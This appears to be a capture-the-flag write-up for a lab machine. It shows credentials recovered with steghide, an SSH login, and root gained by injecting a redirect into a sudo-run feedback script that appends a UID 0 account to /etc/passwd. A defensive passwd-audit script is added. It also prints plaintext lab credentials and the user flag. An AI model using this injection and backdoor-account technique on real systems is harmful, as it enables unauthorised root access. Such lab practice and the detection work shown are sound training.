Local IP: 10.17.5.121
Target IP: 10.10.167.217
Information gathering

403 bypass?


Analyzing the captured traffic

The file really does exist

Fuzzing


webshell
Foothold: getting a webshell

Reverse shell


Upgrading to a TTY


kali@kali ~/Documents/thm/U-A-High-School
❯ hexeditor -b oneforall.jpg
kali@kali ~/Documents/thm/U-A-High-School
❯ thunar
kali@kali ~/Documents/thm/U-A-High-School
❯ steghide extract -sf oneforall.jpg
Enter passphrase:
the file "creds.txt" does already exist. overwrite ? (y/n) n
steghide: did not write to file "creds.txt".
kali@kali ~/Documents/thm/U-A-High-School [1]
❯ cat creds.txt
Hi Deku, this is the only way I've found to give you your account credentials, as soon as you have them, delete this file:
deku:One?For?All_!!one1/A
usershell
❯ ssh deku@10.10.167.217
The authenticity of host '10.10.167.217 (10.10.167.217)' can't be established.
ED25519 key fingerprint is SHA256:OgRmqdwC/bY0nCsZ5+MHrpGGo75F1+78/LGZjSVg2VY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.167.217' (ED25519) to the list of known hosts.
deku@10.10.167.217's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-153-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sat 16 Nov 2024 06:35:11 AM UTC
System load: 0.0 Processes: 119
Usage of /: 47.0% of 9.75GB Users logged in: 0
Memory usage: 48% IPv4 address for eth0: 10.10.167.217
Swap usage: 0%
* Introducing Expanded Security Maintenance for Applications.
Receive updates to over 25,000 software packages with your
Ubuntu Pro subscription. Free for personal use.
https://ubuntu.com/pro
Expanded Security Maintenance for Applications is not enabled.
37 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Thu Feb 22 21:27:54 2024 from 10.0.0.3
deku@myheroacademia:~$
rootshell
THM{W3lC0m3_D3kU_1A_0n3f0rAll??}
deku@myheroacademia:~$ sudo -l
[sudo] password for deku:
Matching Defaults entries for deku on myheroacademia:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User deku may run the following commands on myheroacademia:
(ALL) /opt/NewComponent/feedback.sh
Arbitrary commands can be injected through the feedback input
deku@myheroacademia:~$ sudo /opt//NewComponent/feedback.sh
Hello, Welcome to the Report Form
This is a way to report various problems
Developed by
The Technical Department of U.A.
Enter your feedback:
test>/tmp/tet.txt
It is This:
Feedback successfully saved.
deku@myheroacademia:~$ cat /tmp/tet.txt
Manually generating a password hash
mkpasswd -m md5crypt -s
Password: admin
$1$G0VpEiUX$xG8amhil.KWmevqLhCvsE1
test:$1$G0VpEiUX$xG8amhil.KWmevqLhCvsE1:0:0:test:/root:/bin/bash
deku@myheroacademia:~$ sudo /opt//NewComponent/feedback.sh
Hello, Welcome to the Report Form
This is a way to report various problems
Developed by
The Technical Department of U.A.
Enter your feedback:
'test:$1$G0VpEiUX$xG8amhil.KWmevqLhCvsE1:0:0:test:/root:/bin/bash' >> /etc/passwd
It is This:
Feedback successfully saved.
deku@myheroacademia:~$ cat /etc/passwd
deku@myheroacademia:~$ tail -n1 /etc/passwd
test:$1$G0VpEiUX$xG8amhil.KWmevqLhCvsE1:0:0:test:/root:/bin/bash
deku@myheroacademia:~$ su test
Password:
root@myheroacademia:/home/deku# id
uid=0(root) gid=0(root) groups=0(root)
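The escalation above works because a passwd entry whose second field holds a hash (instead of the usual `x` placeholder for /etc/shadow) is still honoured by `su`/login, and nothing stops a second UID 0 account from existing. The following Python script is an added example for the defensive side, not part of the original writeup: it parses passwd-format text and flags exactly those two indicators (a non-root UID 0 account, and a hash or empty string stored directly in the passwd file), plus malformed lines. The `SAMPLE_PASSWD` content is constructed for the example; the last line is the entry appended above.

```python
"""Audit /etc/passwd-style content for backdoor accounts (added example)."""
import sys
from dataclasses import dataclass

# Constructed sample: a normal system plus the line appended in the writeup.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
deku:x:1000:1000:deku:/home/deku:/bin/bash
test:$1$G0VpEiUX$xG8amhil.KWmevqLhCvsE1:0:0:test:/root:/bin/bash
"""

# Values that legitimately appear in the password field of /etc/passwd:
# 'x' defers to /etc/shadow, '*', '!' and '!!' mean the account is locked.
NON_HASH_MARKERS = {"x", "*", "!", "!!"}


@dataclass
class Finding:
    line_no: int
    user: str
    reason: str


def parse_passwd(text):
    """Yield (line_no, fields) per entry; fields is None for malformed lines."""
    for line_no, line in enumerate(text.splitlines(), start=1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        yield line_no, (fields if len(fields) == 7 else None)


def audit_passwd(text):
    """Return a list of Findings for suspicious entries in passwd-format text."""
    findings = []
    for line_no, fields in parse_passwd(text):
        if fields is None:
            findings.append(Finding(line_no, "?", "malformed line (expected 7 fields)"))
            continue
        user, pw, uid, _gid, _gecos, _home, _shell = fields
        # Indicator 1: any UID 0 account that is not 'root'.
        if uid == "0" and user != "root":
            findings.append(Finding(line_no, user, "UID 0 account other than root"))
        # Indicator 2: an empty password field (no password needed) or a hash
        # stored in passwd instead of shadow; both bypass shadow protections.
        if pw == "":
            findings.append(Finding(line_no, user, "empty password field"))
        elif pw not in NON_HASH_MARKERS:
            findings.append(Finding(line_no, user, "password hash stored in passwd instead of shadow"))
    return findings


if __name__ == "__main__":
    # Audit a real file if a path is given, otherwise the constructed sample.
    content = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_PASSWD
    for f in audit_passwd(content):
        print(f"line {f.line_no}: user {f.user!r}: {f.reason}")
```

Run it as `python3 audit_passwd.py /etc/passwd` on a host to get one line per suspicious entry; on the sample it reports the `test` account twice (UID 0 and an inline hash). Pairing this with a file-integrity check on /etc/passwd and /etc/sudoers catches the same appended line the moment it lands.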
root@myheroacademia:~# cat root.txt
root@myheroacademia:/opt/NewComponent# cat /root/root.txt
__ __ _ _ _ _____ _
\ \ / /__ _ _ / \ _ __ ___ | \ | | _____ __ |_ _| |__ ___
\ V / _ \| | | | / _ \ | '__/ _ \ | \| |/ _ \ \ /\ / / | | | '_ \ / _ \
| | (_) | |_| | / ___ \| | | __/ | |\ | (_) \ V V / | | | | | | __/
|_|\___/ \__,_| /_/ \_\_| \___| |_| \_|\___/ \_/\_/ |_| |_| |_|\___|
_ _
_ _ ___ | | | |
| \ | | ___ / | | |__| | ___ _ __ ___
| \| |/ _ \/_/| | | __ |/ _ \ '__|/ _ \
| |\ | (_) __| |_ | | | | __/ | | (_) |
|_| \_|\___/|______| |_| |_|\___|_| \___/